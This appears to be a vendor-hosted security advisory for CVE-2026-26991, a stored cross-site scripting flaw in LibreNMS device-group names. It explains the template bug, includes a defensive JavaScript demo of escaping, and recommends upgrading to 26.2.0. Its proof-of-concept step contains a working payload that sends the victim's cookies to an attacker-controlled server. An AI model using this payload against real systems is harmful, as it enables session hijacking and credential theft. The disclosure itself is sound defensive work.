CVE-2026-26991

CVE-2026-26991 is a medium-severity cross-site scripting (XSS) vulnerability in librenms/librenms (composer), affecting versions < 26.2.0. It is fixed in 26.2.0.

Summary

/device-groups name Stored Cross-Site Scripting

  • HTTP POST
  • Request-URI(s): "/device-groups"
  • Vulnerable parameter(s): "name"
  • Attacker must be authenticated with "admin" privileges.
  • When a user adds a device group, an HTTP POST request is sent to the Request-URI "/device-groups". The name of the newly created device group is stored in the value of the name parameter.
  • After the device group is created, the entry is displayed along with some relevant buttons like Rediscover Devices, Edit, and Delete.

Details

The vulnerability exists as the name of the device group is not sanitized of HTML/JavaScript-related characters
or strings. When the delete button is rendered, the following template is used to render the page:

resources/views/device-group/index.blade.php:

@section('title', __('Device Groups'))
@section('content')
<div class="container-fluid">
<x-panel id="manage-device-groups-panel">
// [...Truncated...]
@foreach($device_groups as $device_group)
// [...Truncated...]

<button type="button" class="btn btn-danger btn-sm" title="{{ __('delete Device Group') }}" aria-label="{{ __('Delete') }}"
        onclick="delete_dg(this, '{{ $device_group->name }}', '{{ route('device-groups.destroy', $device_group->id) }}')">
// the device group's name is used in the Delete button's onclick handler without sanitizing for XSS-related characters/strings

As the device group's name is not sanitized of HTML/JavaScript-related characters or strings, this can result in stored cross-site scripting.
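An added example (not LibreNMS code) that models the context mismatch in the template above: the name is placed inside a JavaScript string literal in an HTML attribute, and the browser decodes HTML entities in that attribute before the JavaScript engine parses the handler, so a single quote in the name still closes the literal. It assumes Blade's {{ }} behaves like PHP htmlspecialchars with ENT_QUOTES (Laravel's e()), uses constructed group names and route URL, and contrasts the template with a hardened form that escapes the value for the JavaScript string context (Laravel's Js::from helper exists for that purpose; moving the value into a data- attribute and reading it from script is the other common fix).

```javascript
// Added example (not LibreNMS code): {{ }} is assumed to behave like PHP htmlspecialchars
// with ENT_QUOTES (Laravel's e()); group names and the route URL below are constructed.

// Emulates Blade's {{ }} (htmlspecialchars, ENT_QUOTES).
function bladeEscape(s) {
  return s.replace(/&/g, '&amp;').replace(/</g, '&lt;').replace(/>/g, '&gt;')
          .replace(/"/g, '&quot;').replace(/'/g, '&#039;');
}

// Emulates the browser decoding entities in an attribute value (&amp; last, to avoid double-decoding).
function attributeDecode(s) {
  return s.replace(/&#039;/g, "'").replace(/&quot;/g, '"').replace(/&lt;/g, '<')
          .replace(/&gt;/g, '>').replace(/&amp;/g, '&');
}

// Hardened form: everything outside a conservative allow-list becomes a JavaScript \xHH / \uHHHH
// escape. Attribute decoding leaves these untouched, so the value can only ever be string data.
function jsStringEscape(s) {
  return s.replace(/[^A-Za-z0-9 ,._-]/g, (c) => {
    const h = c.charCodeAt(0).toString(16);
    return h.length <= 2 ? '\\x' + h.padStart(2, '0') : '\\u' + h.padStart(4, '0');
  });
}

// The onclick source as the JS engine sees it, for the vulnerable or the hardened template.
function onclickAsExecuted(name, url, hardened) {
  const v = hardened ? jsStringEscape(name) : bladeEscape(name);
  return attributeDecode(`delete_dg(this, '${v}', '${bladeEscape(url)}')`);
}

// Reads the first single-quoted JS string literal from the handler source, decoding
// \xHH and \uHHHH escapes (other escapes are taken literally; enough for this demo).
function firstStringArg(js) {
  const start = js.indexOf("'");
  let out = '';
  for (let i = start + 1; start >= 0 && i < js.length; i++) {
    const c = js[i];
    if (c === "'") return out;
    if (c !== '\\') { out += c; continue; }
    const m = /^(x[0-9a-f]{2}|u[0-9a-f]{4})/i.exec(js.slice(i + 1));
    if (m) { out += String.fromCharCode(parseInt(m[1].slice(1), 16)); i += m[1].length; }
    else out += js[++i];
  }
  return null; // no literal, or unterminated
}

// True when the whole name survives as the first string argument (no break-out).
function nameStaysData(name, url, hardened) {
  return firstStringArg(onclickAsExecuted(name, url, hardened)) === name;
}
```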

PoC

  • Login
  • Select Devices > Manage Groups
  • Select New Device Group
  • Input 12345');var pt=new Image();pt.src='http:///cookie-'.concat(document.cookie);document.body.appendChild(pt);delete_dg(this, '12345 into the "Name" input box (replace the empty host in http:/// with the IP of an attacker-controlled web server)
  • Select "access_points.accesspoint_id" as the Conditional input
  • Input 1 into the Conditional value input box
  • Select Save
  • Select the Delete Icon for the newly created Device Group
  • Select OK
  • The JavaScript payload is not sanitized and an HTTP request will be sent to the attacker-controlled server, leaking the user's cookies.

Impact

The attacker-controlled server's access log recorded a GET request for /cookie- followed by the victim's URL-encoded cookies, confirming the leak.


Untrusted input is rendered as active markup in a victim's browser, which can run script in their session. Typical impact: session or credential theft, and actions taken as the user.

Affected versions

librenms/librenms (< 26.2.0)

Security releases

librenms/librenms → 26.2.0 (composer)

Kodem intelligence

Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.

Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter. Kodem's runtime-powered SCA identifies whether this CVE is reachable in your applications.


Remediation advice

Upgrade librenms/librenms to 26.2.0 or later to resolve this vulnerability.

Kodem Kai can prioritize this vulnerability in your dependency tree and generate a fix recommendation.

Frequently Asked Questions

  1. What is CVE-2026-26991? CVE-2026-26991 is a medium-severity cross-site scripting (XSS) vulnerability in librenms/librenms (composer), affecting versions < 26.2.0. It is fixed in 26.2.0. Untrusted input is rendered as active markup in a victim's browser, which can run script in their session.
  2. Which versions of librenms/librenms are affected by CVE-2026-26991? librenms/librenms (composer) versions < 26.2.0 are affected.
  3. Is there a fix for CVE-2026-26991? Yes. CVE-2026-26991 is fixed in 26.2.0. Upgrade to this version or later.
  4. Is CVE-2026-26991 exploitable, and should I be worried? Whether CVE-2026-26991 is exploitable in your environment depends on whether the vulnerable code is present and reachable. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk.
  5. What actually determines whether CVE-2026-26991 is exploitable, and how bad it is? Exploitability and impact are not fixed properties of a CVE. They depend on runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A high CVSS score on a dependency that never runs is not the same as real risk. Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter.
  6. How do I fix CVE-2026-26991? Upgrade librenms/librenms to 26.2.0 or later.

